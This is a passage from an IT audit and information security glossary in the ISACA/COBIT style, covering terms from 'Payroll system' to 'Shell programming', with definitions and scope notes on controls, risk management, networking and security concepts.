Payroll system: An electronic system for processing payroll information and the related electronic (e.g., electronic timekeeping and/or human resources [HR] system), human (e.g., payroll clerk), and external party (e.g., bank) interfaces
In a more limited sense, it is the electronic system that performs the processing for generating payroll checks and/or bank direct deposits to employees.
Penetration testing: A live test of the effectiveness of security defenses through mimicking the actions of real-life attackers
Performance: In IT, the actual implementation or achievement of a process
Performance driver: A measure that is considered the "driver" of a lag indicator
It can be measured before the outcome is clear and, therefore, is called a "lead indicator."
Scope Note: There is an assumed relationship between the two that suggests that improved performance in a leading indicator will drive better performance in the lagging indicator. They are also referred to as key performance indicators (KPIs) and are used to indicate whether goals are likely to be met.
Performance indicators: A set of metrics designed to measure the extent to which performance objectives are being achieved on an ongoing basis
Scope Note: Performance indicators can include service level agreements (SLAs), critical success factors (CSFs), customer satisfaction ratings, internal or external benchmarks, industry best practices and international standards.
Performance management: In IT, the ability to manage any type of measurement, including employee, team, process, operational or financial measurements
The term connotes closed-loop control and regular monitoring of the measurement.
Performance testing: Comparing the system's performance to other equivalent systems, using well-defined benchmarks
Peripherals: Auxiliary computer hardware equipment used for input, output and data storage
Scope Note: Examples of peripherals include disk drives and printers.
Personal digital assistant (PDA): Also called palmtop and pocket computer, a PDA is a handheld device that provides computing, Internet, networking and telephone characteristics.
Personal identification number (PIN): A type of password (i.e., a secret number assigned to an individual) that, in conjunction with some means of identifying the individual, serves to verify the authenticity of the individual
Scope Note: PINs have been adopted by financial institutions as the primary means of verifying customers in an electronic funds transfer (EFT) system.
Pervasive IS control: General control designed to manage and monitor the IS environment and which, therefore, affects all IS-related activities
Phase of BCP: A step-by-step approach consisting of various phases
Scope Note: Phase of BCP is usually comprised of the following phases: pre-implementation phase, implementation phase, testing phase, and post-implementation phase.
Phishing: This is a type of electronic mail (e-mail) attack that attempts to convince a user that the originator is genuine, but with the intention of obtaining information for use in social engineering
Scope Note: Phishing attacks may take the form of masquerading as a lottery organization advising the recipient or the user's bank of a large win; in either case, the intent is to obtain account and personal identification number (PIN) details. Alternative attacks may seek to obtain apparently innocuous business information, which may be used in another form of active attack.
Phreakers: Those who crack security, most frequently telephone and other communication networks
Piggybacking: 1. Following an authorized person into a restricted access area
2. Electronically attaching to an authorized telecommunications link to intercept and possibly alter transmissions
Plain old telephone service (POTS): A wired telecommunications system.
Plaintext: Digital information, such as cleartext, that is intelligible to the reader
Platform as a Service (PaaS): Offers the capability to deploy onto the cloud infrastructure customer-created or acquired applications that are created using programming languages and tools supported by the provider
PMBOK (Project Management Body of Knowledge): A project management standard developed by the Project Management Institute (PMI)
Point of presence (POP): A telephone number that represents the area in which the communication provider or Internet service provider (ISP) provides service
Point of sale (POS) systems: Enables the capture of data at the time and place of transaction
Scope Note: POS terminals may include use of optical scanners for use with bar codes or magnetic card readers for use with credit cards. POS systems may be online to a central computer or may use standalone terminals or microcomputers that hold the transactions until the end of a specified period when they are sent to the main computer for batch processing.
Point-to-point Protocol (PPP): A protocol used for transmitting data between two ends of a connection
Point-to-point Tunneling Protocol (PPTP): A protocol used to transmit data securely between two end points to create a virtual private network (VPN).
Policy: 1. Generally, a document that records a high-level principle or course of action that has been decided on
The intended purpose is to influence and guide both present and future decision making to be in line with the philosophy, objectives and strategic plans established by the enterprise's management teams.
Scope Note: In addition to policy content, policies need to describe the consequences of failing to comply with the policy, the means for handling exceptions, and the manner in which compliance with the policy will be checked and measured.
2. Overall intention and direction as formally expressed by management
Scope Note: COBIT 5 perspective
Polymorphism (Objects): Polymorphism refers to database structures that send the same command to different child objects that can produce different results depending on their family hierarchical tree structure
Population: The entire set of data from which a sample is selected and about which an IS auditor wishes to draw conclusions
Port (Port number): A process or application-specific software element serving as a communication endpoint for the Transport Layer IP protocols (UDP and TCP)
Port scanning: The act of probing a system to identify open ports
Portfolio: A grouping of "objects of interest" (investment programs, IT services, IT projects, other IT assets or resources) managed and monitored to optimize business value
(The investment portfolio is of primary interest to Val IT. IT service, project, asset and other resource portfolios are of primary interest to COBIT.)
Posting: The process of actually entering transactions into computerized or manual files
Scope Note: Posting transactions might immediately update the master files or may result in memo posting, in which the transactions are accumulated over a period of time and then applied to master file updating.
Preventive application control: Application control that is intended to prevent an error from occurring
Preventive application controls are typically executed at the transaction level, before an action is performed.
Preventive control: An internal control that is used to avoid undesirable events, errors and other occurrences that an enterprise has determined could have a negative material effect on a process or end product
Prime number: A natural number greater than 1 that can only be divided by 1 and itself.
PRINCE2 (Projects in a Controlled Environment): Developed by the Office of Government Commerce (OGC), PRINCE2 is a project management method that covers the management, control and organization of a project.
Principle: An enabler of governance and of management. Comprises the values and fundamental assumptions held by the enterprise, the beliefs that guide and put boundaries around the enterprise's decision making, communication within and outside the enterprise, and stewardship (caring for assets owned by another).
Scope Note: Examples: Ethics charter, social responsibility charter.
COBIT 5 perspective
Principle of least privilege/access: Controls used to allow the least privilege access needed to complete a task
Privacy: Freedom from unauthorized intrusion or disclosure of information about an individual
Private branch exchange (PBX): A telephone exchange that is owned by a private business, as opposed to one owned by a common carrier or by a telephone company
Private key: A mathematical key (kept secret by the holder) used to create digital signatures and, depending on the algorithm, to decrypt messages or files encrypted (for confidentiality) with the corresponding public key
Private key cryptosystems: Used in data encryption, it utilizes a secret key to encrypt the plaintext to the ciphertext. Private key cryptosystems also use the same key to decrypt the ciphertext to the corresponding plaintext.
Scope Note: In this case, the key is symmetric such that the encryption key is equivalent to the decryption key.
Privilege: The level of trust with which a system object is imbued
Probe: Inspect a network or system to find weak spots
Problem: In IT, the unknown underlying cause of one or more incidents
Problem escalation procedure: The process of escalating a problem up from junior to senior support staff, and ultimately to higher levels of management
Scope Note: Problem escalation procedure is often used in help desk management, when an unresolved problem is escalated up the chain of command, until it is solved.
Procedure: A document containing a detailed description of the steps necessary to perform specific operations in conformance with applicable standards. Procedures are defined as part of processes.
Process: Generally, a collection of activities influenced by the enterprise's policies and procedures that takes inputs from a number of sources (including other processes), manipulates the inputs and produces outputs
Scope Note: Processes have clear business reasons for existing, accountable owners, clear roles and responsibilities around the execution of the process, and the means to measure performance.
Process goals: A statement describing the desired outcome of a process.
Scope Note: An outcome can be an artifact, a significant change of a state or a significant capability improvement of other processes.
COBIT 5 perspective
Process maturity assessment: A subjective assessment technique derived from the Software Engineering Institute (SEI) capability maturity model integration (CMMI) concepts and developed as a COBIT management tool
It provides management with a profile of how well developed the IT management processes are.
Scope Note: It enables management to easily place itself on a scale and appreciate what is required if improved performance is needed. It is used to set targets, raise awareness, capture broad consensus, identify improvements and positively motivate change.
Process maturity attribute: The different aspects of a process covered in an assurance initiative
Production program: Program used to process live or actual data that were received as input into the production environment
Production software: Software that is being used and executed to support normal and authorized organizational operations
Scope Note: Production software is to be distinguished from test software, which is being developed or modified, but has not yet been authorized for use by management.
Professional competence: Proven level of ability, often linked to qualifications issued by relevant professional bodies and compliance with their codes of practice and standards
Professional judgement: The application of relevant knowledge and experience in making informed decisions about the courses of action that are appropriate in the circumstances of the IS audit and assurance engagement
Professional skepticism: An attitude that includes a questioning mind and a critical assessment of audit evidence
Scope Note: Source: American Institute of Certified Public Accountants (AICPA) AU 230.07
Professional standards: Refers to standards issued by ISACA.
The term may extend to related guidelines and techniques that assist the professional in implementing and complying with authoritative pronouncements of ISACA. In certain instances, standards of other professional organizations may be considered, depending on the circumstances and their relevance and appropriateness.
Program: A structured grouping of interdependent projects that is both necessary and sufficient to achieve a desired business outcome and create value
These projects could include, but are not limited to, changes in the nature of the business, business processes and the work performed by people as well as the competencies required to carry out the work, the enabling technology, and the organizational structure.
Program and project management office (PMO): The function responsible for supporting program and project managers, and gathering, assessing and reporting information about the conduct of their programs and constituent projects
Program Evaluation and Review Technique (PERT): A project management technique used in the planning and control of system projects
Program flowchart: Shows the sequence of instructions in a single program or subroutine
Scope Note: The symbols used in program flowcharts should be the internationally accepted standard. Program flowcharts should be updated when necessary.
Program narrative: Provides a detailed explanation of program flowcharts, including control points and any external input
Project: A structured set of activities concerned with delivering a defined capability (that is necessary but not sufficient, to achieve a required business outcome) to the enterprise based on an agreed-on schedule and budget
Project management officer (PMO): The individual function responsible for the implementation of a specified initiative for supporting the project management role and advancing the discipline of project management
Project portfolio: The set of projects owned by a company
Scope Note: It usually includes the main guidelines relative to each project, including objectives, costs, timelines and other information specific to the project.
Project team: Group of people responsible for a project, whose terms of reference may include the development, acquisition, implementation or maintenance of an application system
Scope Note: The project team members may include line management, operational line staff, external contractors and IS auditors.
Promiscuous mode: Allows the network interface to capture all network traffic irrespective of the hardware device to which the packet is addressed
Protection domain: The area of the system that the intrusion detection system (IDS) is meant to monitor and protect
Protocol: The rules by which a network operates and controls the flow and priority of transmissions
Protocol converter: Hardware devices, such as asynchronous and synchronous transmissions, that convert between two different types of transmission
Protocol stack: A set of utilities that implement a particular network protocol
Scope Note: For instance, in Windows machines a Transmission Control Protocol/Internet Protocol (TCP/IP) stack consists of TCP/IP software, sockets software and hardware driver software.
Prototyping: The process of quickly putting together a working model (a prototype) in order to test various aspects of a design, illustrate ideas or features and gather early user feedback
Scope Note: Prototyping uses programmed simulation techniques to represent a model of the final system to the user for advisement and critique. The emphasis is on end-user screens and reports. Internal controls are not a priority item since this is only a model.
Proxy server: A server that acts on behalf of a user
Scope Note: Typical proxies accept a connection from a user, make a decision as to whether the user or client IP address is permitted to use the proxy, perhaps perform additional authentication, and complete a connection to a remote destination on behalf of the user.
Public key: In an asymmetric cryptographic scheme, the key that may be widely published to enable the operation of the scheme
Public key cryptosystem: Used in data encryption, it uses an encryption key, as a public key, to encrypt the plaintext to the ciphertext. It uses the different decryption key, as a secret key, to decrypt the ciphertext to the corresponding plaintext.
Scope Note: In contrast to a private key cryptosystem, the decryption key should be secret; however, the encryption key can be known to everyone. In a public key cryptosystem, two keys are asymmetric, such that the encryption key is not equivalent to the decryption key.
Public key encryption: A cryptographic system that uses two keys: one is a public key, which is known to everyone, and the second is a private or secret key, which is only known to the recipient of the message
See also Asymmetric Key.
Public key infrastructure (PKI): A series of processes and technologies for the association of cryptographic keys with the entity to whom those keys were issued
Public switched telephone network (PSTN): A communications system that sets up a dedicated channel (or circuit) between two points for the duration of the transmission.
Quality: Being fit for purpose (achieving intended value)
Scope Note: COBIT 5 perspective
Quality assurance (QA): A planned and systematic pattern of all actions necessary to provide adequate confidence that an item or product conforms to established technical requirements. (ISO/IEC 24765)
Quality management system (QMS): A system that outlines the policies and procedures necessary to improve and control the various processes that will ultimately lead to improved enterprise performance
Queue: A group of items that is waiting to be serviced or processed
Quick ship: A recovery solution provided by recovery and/or hardware vendors that includes a pre-established contract to deliver hardware resources within a specified number of hours after a disaster occurs
Scope Note: The quick ship solution usually provides enterprises with the ability to recover within 72 or more hours.
RACI chart: Illustrates who is Responsible, Accountable, Consulted and Informed within an organizational framework
Radio wave interference: The superposition of two or more radio waves resulting in a different radio wave pattern that is more difficult to intercept and decode properly
Random access memory (RAM): The computer's primary working memory
Scope Note: Each byte of RAM can be accessed randomly regardless of adjacent bytes.
Range check: Range checks ensure that data fall within a predetermined range
Ransomware: Malware that restricts access to the compromised systems until a ransom demand is satisfied
Rapid application development: A methodology that enables enterprises to develop strategically important systems faster, while reducing development costs and maintaining quality by using a series of proven application development techniques, within a well-defined methodology
Real-time analysis: Analysis that is performed on a continuous basis, with results gained in time to alter the run-time system
Real-time processing: An interactive online system capability that immediately updates computer files when transactions are initiated through a terminal
Reasonable assurance: A level of comfort short of a guarantee, but considered adequate given the costs of the control and the likely benefits achieved
Reasonableness check: Compares data to predefined reasonability limits or occurrence rates established for the data
Reciprocal agreement: Emergency processing agreement between two or more enterprises with similar equipment or applications
Scope Note: Typically, participants of a reciprocal agreement promise to provide processing time to each other when an emergency arises.
Record: A collection of related information that is treated as a unit
Scope Note: Separate fields within the record are used for processing of the information.
Record, screen and report layouts: Record layouts provide information regarding the type of record, its size and the type of data contained in the record. Screen and report layouts describe what information is provided and necessary for input.
Recovery: The phase in the incident response plan that ensures that affected systems or services are restored to a condition specified in the service delivery objectives (SDOs) or business continuity plan (BCP)
Recovery action: Execution of a response or task according to a written procedure
Recovery point objective (RPO): Determined based on the acceptable data loss in case of a disruption of operations
It indicates the earliest point in time that is acceptable to recover the data. The RPO effectively quantifies the permissible amount of data loss in case of interruption.
Recovery strategy: An approach by an enterprise that will ensure its recovery and continuity in the face of a disaster or other major outage
Scope Note: Plans and methodologies are determined by the enterprise's strategy. There may be more than one methodology or solution for an enterprise's strategy.
Examples of methodologies and solutions include: contracting for hot site or cold site, building an internal hot site or cold site, identifying an alternate work area, a consortium or reciprocal agreement, contracting for mobile recovery or crate and ship, and many others.
Recovery testing: A test to check the system's ability to recover after a software or hardware failure
Recovery time objective (RTO): The amount of time allowed for the recovery of a business function or resource after a disaster occurs
Redo logs: Files maintained by a system, primarily a database management system (DBMS), for the purpose of reapplying changes following an error or outage recovery
Redundancy check: Detects transmission errors by appending calculated bits onto the end of each segment of data
Redundant Array of Inexpensive Disks (RAID): Provides performance improvements and fault-tolerant capabilities via hardware or software solutions, by writing to a series of multiple disks to improve performance and/or save large files simultaneously
Redundant site: A recovery strategy involving the duplication of key IT components, including data or other key business processes, whereby fast recovery can take place
Reengineering: A process involving the extraction of components from existing systems and restructuring these components to develop new systems or to enhance the efficiency of existing systems
Scope Note: Existing software systems can be modernized to prolong their functionality. An example is a software code translator that can take an existing hierarchical database system and transpose it to a relational database system. Computer-aided software engineering (CASE) includes a source code reengineering feature.
Registered ports: Registered ports 1024 through 49151: Listed by the IANA and on most systems can be used by ordinary user processes or programs executed by ordinary users
Registration authority (RA): The individual institution that validates an entity's proof of identity and ownership of a key pair
Regression testing: A testing technique used to retest earlier program abends or logical errors that occurred during the initial testing phase
Regulation: Rules or laws defined and enforced by an authority to regulate conduct
Regulatory requirements: Rules or laws that regulate conduct and that the enterprise must obey to become compliant
Relational database management system (RDBMS): The general purpose of a database is to store and retrieve related information.
Scope Note: Database management systems have evolved from hierarchical to network to relational models. Today, the most widely accepted database model is the relational model. The relational model has three major aspects: structures, operations and integrity rules. An Oracle database is a collection of data that is treated as a unit.
Relevant audit evidence: Audit evidence is relevant if it pertains to the audit objectives and has a logical relationship to the findings and conclusions it is used to support.
Relevant information: Relating to controls, tells the evaluator something meaningful about the operation of the underlying controls or control component. Information that directly confirms the operation of controls is most relevant. Information that relates indirectly to the operation of controls can also be relevant, but is less relevant than direct information.
Scope Note: Refer to COBIT 5 information quality goals
Reliable audit evidence: Audit evidence is reliable if, in the IS auditor's opinion, it is valid, factual, objective and supportable.
Reliable information: Information that is accurate, verifiable and from an objective source
Scope Note: Refer to COBIT 5 information quality goals
Remediation: After vulnerabilities are identified and assessed, appropriate remediation can take place to mitigate or eliminate the vulnerability
Remote access service (RAS): Refers to any combination of hardware and software to enable the remote access to tools or information that typically reside on a network of IT devices
Scope Note: Originally coined by Microsoft when referring to their built-in NT remote access tools, RAS was a service provided by Windows NT which allowed most of the services that would be available on a network to be accessed over a modem link. Over the years, many vendors have provided both hardware and software solutions to gain remote access to various types of networked information. In fact, most modern routers include a basic RAS capability that can be enabled for any dial-up interface.
Remote Authentication Dial-in User Service (RADIUS): A type of service providing an authentication and accounting system often used for dial-up and remote access security
Remote job entry (RJE): The transmission of job control language (JCL) and batches of transactions from a remote terminal location
Remote procedure call (RPC): The traditional Internet service protocol widely used for many years on UNIX-based operating systems and supported by the Internet Engineering Task Force (IETF) that allows a program on one computer to execute a program on another (e.g., server)
Scope Note: The primary benefit derived from its use is that a system developer need not develop specific procedures for the targeted computer system. For example, in a client-server arrangement, the client program sends a message to the server with appropriate arguments, and the server returns a message containing the results of the program executed. Common Object Request Broker Architecture (CORBA) and Distributed Component Object Model (DCOM) are two newer object-oriented methods for related RPC functionality.
Removable media: Any type of storage device that can be removed from the system while it is running
Repeaters: A physical layer device that regenerates and propagates electrical signals between two network segments
Scope Note: Repeaters receive signals from one network segment and amplify (regenerate) the signal to compensate for signals (analog or digital) distorted by transmission loss due to reduction of signal strength during transmission (i.e., attenuation)
Replay: The ability to copy a message or stream of messages between two parties and replay (retransmit) them to one or more of the parties
Replication: In its broad computing sense, involves the use of redundant software or hardware elements to provide availability and fault-tolerant capabilities
In a database context, replication involves the sharing of data between databases to reduce workload among database servers, thereby improving client performance while maintaining consistency among all systems.
Repository: An enterprise database that stores and organizes data
Representation: A signed or oral statement issued by management to professionals, where management declares that a current or future fact (e.g., process, system, procedure, policy) is or will be in a certain state, to the best of management's knowledge.
Repudiation: The denial by one of the parties to a transaction, or participation in all or part of that transaction, or of the content of communication related to that transaction
Reputation risk: The current and prospective effect on earnings and capital arising from negative public opinion
Scope Note: Reputation risk affects a bank's ability to establish new relationships or services, or to continue servicing existing relationships. It may expose the bank to litigation, financial loss or a decline in its customer base. A bank's reputation can be damaged by Internet banking services that are executed poorly or otherwise alienate customers and the public. An Internet bank has a greater reputation risk as compared to a traditional brick-and-mortar bank, because it is easier for its customers to leave and go to a different Internet bank and since it cannot discuss any problems in person with the customer.
Request for comments (RFC)
A document that has been approved by the Internet Engineering Task Force (IETF) becomes an RFC and is assigned a unique number once published
Scope Note: If the RFC gains enough interest, it may evolve into an Internet standard.

Request for proposal (RFP)
A document distributed to software vendors requesting them to submit a proposal to develop or provide a software product

Requirements definition
A technique used in which the affected user groups define the requirements of the system for meeting the defined needs
Scope Note: Some of these are business, regulatory, and security related requirements as well as development related requirements.

Residual risk
The remaining risk after management has implemented a risk response

Resilience
The ability of a system or network to resist failure or to recover quickly from any disruption, usually with minimal recognizable effect

Resource
Any enterprise asset that can help the organization achieve its objectives
Scope Note: COBIT 5 perspective

Resource optimization
One of the governance objectives. Involves effective, efficient and responsible use of all resources: human, financial, equipment, facilities, etc.
Scope Note: COBIT 5 perspective

Responsible
In a Responsible, Accountable, Consulted, Informed (RACI) chart, refers to the person who must ensure that activities are completed successfully

Return on investment (ROI)
A measure of operating performance and efficiency, computed in its simplest form by dividing net income by the total investment over the period being considered

Return oriented attacks
An exploit technique in which the attacker uses control of the call stack to indirectly execute cherry picked machine instructions immediately prior to the return instruction in subroutines within the existing program code

Reverse engineering
A software engineering technique whereby an existing application system code can be redesigned and coded using computer aided software engineering (CASE) technology

Ring configuration
Used in either token ring or fiber distributed data interface (FDDI) networks, all stations (nodes) are connected to a multistation access unit (MSAU), that physically resembles a star type topology.
Scope Note: A ring configuration is created when MSAUs are linked together in forming a network. Messages in the network are sent in a deterministic fashion from sender and receiver via a small frame, referred to as a token ring. To send a message, a sender obtains the token with the right priority as the token travels around the ring, with receiving nodes reading those messages addressed to it.

Ring topology
A type of local area network (LAN) architecture in which the cable forms a loop, with stations attached at intervals around the loop
Scope Note: In ring topology, signals transmitted around the ring take the form of messages. Each station receives the messages and each station determines, on the basis of an address, whether to accept or process a given message. However, after receiving a message, each station acts as a repeater, retransmitting the message at its original signal strength.

Risk
The combination of the probability of an event and its consequence. (ISO/IEC 73)

Risk acceptance
If the risk is within the enterprise's risk tolerance or if the cost of otherwise mitigating the risk is higher than the potential loss, the enterprise can assume the risk and absorb any losses

Risk aggregation
The process of integrating risk assessments at a corporate level to obtain a complete view on the overall risk for the enterprise

Risk analysis
1. A process by which frequency and magnitude of IT risk scenarios are estimated
2. The initial steps of risk management: analyzing the value of assets to the business, identifying threats to those assets and evaluating how vulnerable each asset is to those threats
Scope Note: It often involves an evaluation of the probable frequency of a particular event, as well as the probable impact of that event.

Risk appetite
The amount of risk, on a broad level, that an entity is willing to accept in pursuit of its mission

Risk assessment
A process used to identify and evaluate risk and its potential effects
Scope Note: Risk assessments are used to identify those items or areas that present the highest risk, vulnerability or exposure to the enterprise for inclusion in the IS annual audit plan. Risk assessments are also used to manage the project delivery and project benefit risk.

Risk avoidance
The process for systematically avoiding risk, constituting one approach to managing risk

Risk culture
The set of shared values and beliefs that governs attitudes toward risk taking, care and integrity, and determines how openly risk and losses are reported and discussed

Risk evaluation
The process of comparing the estimated risk against given risk criteria to determine the significance of the risk. [ISO/IEC Guide 73:2002]

Risk factor
A condition that can influence the frequency and/or magnitude and, ultimately, the business impact of IT related events/scenarios

Risk indicator
A metric capable of showing that the enterprise is subject to, or has a high probability of being subject to, a risk that exceeds the defined risk appetite

Risk management
1. The coordinated activities to direct and control an enterprise with regard to risk
Scope Note: In the International Standard, the term "control" is used as a synonym for "measure." (ISO/IEC Guide 73:2002)
2. One of the governance objectives. Entails recognizing risk; assessing the impact and likelihood of that risk; and developing strategies, such as avoiding the risk, reducing the negative effect of the risk and/or transferring the risk, to manage it within the context of the enterprise's risk appetite.
Scope Note: COBIT 5 perspective

Risk map
A (graphic) tool for ranking and displaying risk by defined ranges for frequency and magnitude

Risk mitigation
The management of risk through the use of countermeasures and controls

Risk portfolio view
1. A method to identify interdependencies and interconnections among risk, as well as the effect of risk responses on multiple types of risk
2. A method to estimate the aggregate impact of multiple types of risk (e.g., cascading and coincidental threat types/scenarios, risk concentration/correlation across silos) and the potential effect of risk response across multiple types of risk

Risk reduction
The implementation of controls or countermeasures to reduce the likelihood or impact of a risk to a level within the organization's risk tolerance.

Risk tolerance
The acceptable level of variation that management is willing to allow for any particular risk as the enterprise pursues its objectives

Risk transfer
The process of assigning risk to another enterprise, usually through the purchase of an insurance policy or by outsourcing the service

Risk treatment
The process of selection and implementation of measures to modify risk (ISO/IEC Guide 73:2002)

Root cause analysis
A process of diagnosis to establish the origins of events, which can be used for learning from consequences, typically from errors and problems

Rootkit
A software suite designed to aid an intruder in gaining unauthorized administrative access to a computer system

Rotating standby
A fail over process in which there are two nodes (as in idle standby but without priority)
Scope Note: The node that enters the cluster first owns the resource group, and the second will join as a standby node.

Rounding down
A method of computer fraud involving a computer code that instructs the computer to remove small amounts of money from an authorized computer transaction by rounding down to the nearest whole value denomination and rerouting the rounded off amount to the perpetrator's account

Router
A networking device that can send (route) data packets from one local area network (LAN) or wide area network (WAN) to another, based on addressing at the network layer (Layer 3) in the open systems interconnection (OSI) model
Scope Note: Networks connected by routers can use different or similar networking protocols. Routers usually are capable of filtering packets based on parameters, such as source addresses, destination addresses, protocol and network applications (ports).

RS-232 interface
An interface between data terminal equipment and data communications equipment employing serial binary data interchange

RSA
A public key cryptosystem developed by R. Rivest, A. Shamir and L. Adleman used for both encryption and digital signatures
Scope Note: The RSA has two different keys, the public encryption key and the secret decryption key. The strength of the RSA depends on the difficulty of the prime number factorization. For applications with high level security, the number of the decryption key bits should be greater than 512 bits.

Rule base
The list of rules and/or guidance that is used to analyze event data

Run instructions
Computer operating instructions which detail the step by step processes that are to occur so an application system can be properly executed; also identifies how to address problems that occur during processing

Run-to-run totals
Provide evidence that a program processes all input data and that it processed the data correctly

Safeguard
A practice, procedure or mechanism that reduces risk

Salami technique
A method of computer fraud involving a computer code that instructs the computer to slice off small amounts of money from an authorized computer transaction and reroute this amount to the perpetrator's account

Sampling risk
The probability that an IS auditor has reached an incorrect conclusion because an audit sample, rather than the entire population, was tested
Scope Note: While sampling risk can be reduced to an acceptably low level by using an appropriate sample size and selection method, it can never be eliminated.

Sampling stratification
The process of dividing a population into subpopulations with similar characteristics explicitly defined, so that each sampling unit can belong to only one stratum

Scheduling
A method used in the information processing facility (IPF) to determine and establish the sequence of computer job processing

Scope creep
Also called requirement creep, this refers to uncontrolled changes in a project's scope.
Scope Note: Scope creep can occur when the scope of a project is not properly defined, documented and controlled. Typically, the scope increase consists of either new products or new features of already approved products. Hence, the project team drifts away from its original purpose. Because of one's tendency to focus on only one dimension of a project, scope creep can also result in a project team overrunning its original budget and schedule. For example, scope creep can be a result of poor change control, lack of proper identification of what products and features are required to bring about the achievement of project objectives in the first place, or a weak project manager or executive sponsor.

Scoping process
Identifying the boundary or extent to which a process, procedure, certification, contract, etc., applies

Screening routers
A router configured to permit or deny traffic based on a set of permission rules installed by the administrator

Secure Electronic Transaction (SET)
A standard that will ensure that credit card and associated payment order information travels safely and securely between the various involved parties on the Internet.

Secure Multipurpose Internet Mail Extensions (S/MIME)
Provides cryptographic security services for electronic messaging applications: authentication, message integrity and nonrepudiation of origin (using digital signatures) and privacy and data security (using encryption) to provide a consistent way to send and receive MIME data. (RFC 2311)

Secure Shell (SSH)
Network protocol that uses cryptography to secure communication, remote command line login and remote command execution between two networked computers

Secure Sockets Layer (SSL)
A protocol that is used to transmit private documents through the Internet
Scope Note: The SSL protocol uses a private key to encrypt the data that are to be transferred through the SSL connection.

Security administrator
The person responsible for implementing, monitoring and enforcing security rules established and authorized by management

Security as a Service (SecaaS)
The next generation of managed security services dedicated to the delivery, over the Internet, of specialized information security services.

Security awareness
The extent to which every member of an enterprise and every other individual who potentially has access to the enterprise's information understand:
- Security and the levels of security appropriate to the enterprise
- The importance of security and consequences of a lack of security
- Their individual responsibilities regarding security (and act accordingly)
Scope Note: This definition is based on the definition for IT security awareness as defined in Implementation Guide: How to Make Your Organization Aware of IT Security, European Security Forum (ESF), London, 1993

Security awareness campaign
A predefined, organized number of actions aimed at improving the security awareness of a special target audience about a specific security problem
Each security awareness program consists of a number of security awareness campaigns.

Security awareness coordinator
The individual responsible for setting up and maintaining the security awareness program and coordinating the different campaigns and efforts of the various groups involved in the program
He/she is also responsible for making sure that all materials are prepared, advocates/trainers are trained, campaigns are scheduled, events are publicized and the program as a whole moves forward.

Security awareness program
A clearly and formally defined plan, structured approach, and set of related activities and procedures with the objective of realizing and maintaining a security aware culture
Scope Note: This definition clearly states that it is about realizing and maintaining a security aware culture, meaning attaining and sustaining security awareness at all times. This implies that a security awareness program is not a one time effort, but a continuous process.

Security forum
Responsible for information security governance within the enterprise
Scope Note: A security forum can be part of an existing management body. Because information security is a business responsibility shared by all members of the executive management team, the forum needs to involve executives from all significant parts of the enterprise. Typically, a security forum has the following tasks and responsibilities:
- Defining a security strategy in line with the business strategy
- Identifying security requirements
- Establishing a security policy
- Drawing up an overall security program or plan
- Approving major initiatives to enhance information security
- Reviewing and monitoring information security incidents
- Monitoring significant changes in the exposure of information assets to major threats

Security incident
A series of unexpected events that involves an attack or series of attacks (compromise and/or breach of security) at one or more sites
A security incident normally includes an estimation of its level of impact. A limited number of impact levels are defined and, for each, the specific actions required and the people who need to be notified are identified.

Security management
The process of establishing and maintaining security for a computer or network system
Scope Note: The stages of the process of security management include prevention of security problems, detection of intrusions, and investigation of intrusions and resolution. In network management, the stages are: controlling access to the network and resources, finding intrusions, identifying entry points for intruders and repairing or otherwise closing those avenues of access.

Security metrics
A standard of measurement used in management of security related activities

Security perimeter
The boundary that defines the area of security concern and security policy coverage

Security policy
A high level document representing an enterprise's information security philosophy and commitment

Security procedures
The formal documentation of operational steps and processes that specify how security goals and objectives set forward in the security policy and standards are to be achieved

Security software
Software used to administer security, which usually includes authentication of users, access granting according to predefined rules, monitoring and reporting functions

Security standards
Practices, directives, guidelines, principles or baselines that state what needs to be done and focus areas of current relevance and concern; they are a translation of issues already mentioned in the security policy

Security testing
Ensuring that the modified or new system includes appropriate controls and does not introduce any security holes that might compromise other systems or misuses of the system or its information

Security/transaction risk
The current and prospective risk to earnings and capital arising from fraud, error and the inability to deliver products or services, maintain a competitive position, and manage information
Scope Note: Security risk is evident in each product and service offered, and it encompasses product development and delivery, transaction processing, systems development, computing systems, complexity of products and services and the internal control environment. A high level of security risk may exist with Internet banking products, particularly if those lines of business are not adequately planned, implemented and monitored.

Segregation/separation of duties (SoD)
A basic internal control that prevents or detects errors and irregularities by assigning to separate individuals the responsibility for initiating and recording transactions and for the custody of assets
Scope Note: Segregation/separation of duties is commonly used in large IT organizations so that no single person is in a position to introduce fraudulent or malicious code without detection.

Sensitivity
A measure of the impact that improper disclosure of information may have on an enterprise

Sequence check
Verification that the control number follows sequentially and any control numbers out of sequence are rejected or noted on an exception report for further research
Scope Note: Can be alpha or numeric and usually utilizes a key field

Sequential file
A computer file storage format in which one record follows another
Scope Note: Records can be accessed sequentially only. It is required with magnetic tape.

Service bureau
A computer facility that provides data processing services to clients on a continual basis

Service catalogue
Structured information on all IT services available to customers
Scope Note: COBIT 5 perspective

Service delivery objective (SDO)
Directly related to the business needs, SDO is the level of services to be reached during the alternate process mode until the normal situation is restored

Service desk
The point of contact within the IT organization for users of IT services

Service level agreement (SLA)
An agreement, preferably documented, between a service provider and the customer(s)/user(s) that defines minimum performance targets for a service and how they will be measured

Service provider
An organization supplying services to one or more (internal or external) customers

Service Set Identifier (SSID)
A 32 character unique identifier attached to the header of packets sent over a wireless local area network (WLAN) that acts as a password when a mobile device tries to connect to the base station subsystem (BSS).
Scope Note: The SSID differentiates one WLAN from another so all access points and all devices attempting to connect to a specific WLAN must use the same SSID. A device will not be permitted to join the BSS unless it can provide the unique SSID. Because an SSID can be sniffed in plain text from a packet, it does not supply any security to the network. An SSID is also referred to as a network name, because it is a name that identifies a wireless network.

Service user
The organization using the outsourced service.

Service oriented architecture (SOA)
A cloud based library of proven, functional software applets that are able to be connected together to become a useful online application

Servlet
A Java applet or a small program that runs within a web server environment
Scope Note: A Java servlet is similar to a common gateway interface (CGI) program, but unlike a CGI program, once started, it stays in memory and can fulfill multiple requests, thereby saving server execution time and speeding up the services.

Session border controller (SBC)
Provide security features for voice over IP (VoIP) traffic similar to that provided by firewalls
Scope Note: SBCs can be configured to filter specific VoIP protocols, monitor for denial of service (DoS) attacks, and provide network address and protocol translation features.

Shell
The interface between the user and the system

Shell programming
A script written for the shell, or command line interpreter, of an operating system; it is often considered a simple domain specific programming language
Scope Note: Typical operations performed by shell scripts include file manipulation, program execution and printing text. Usually, shell script refers to scripts written for a UNIX shell, while command.com (DOS) and cmd.exe (Windows) command line scripts are usually called batch files. Many shell script interpreters double as a command line interface such as the various UNIX shells, Windows PowerShell or the MS-DOS command.com. Others, such as AppleScript, add scripting capability to computing environments lacking a command line interface. Other examples of programming languages primarily intended for shell scripting include digital command language (DCL) and job control language (JCL).
